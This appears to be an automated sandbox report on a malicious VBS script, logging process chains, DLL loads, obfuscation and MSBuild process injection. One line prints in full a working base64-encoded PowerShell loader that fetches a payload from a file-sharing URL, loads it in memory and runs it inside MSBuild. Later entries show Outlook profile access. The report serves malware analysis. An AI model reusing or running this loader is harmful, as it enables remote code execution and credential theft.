                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString(", "0", "false");
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAAC5A7969 push ebx; retf 2_2_00007FFAAC5A796A
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2F40000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 31E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2F40000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598317
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597874
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596116
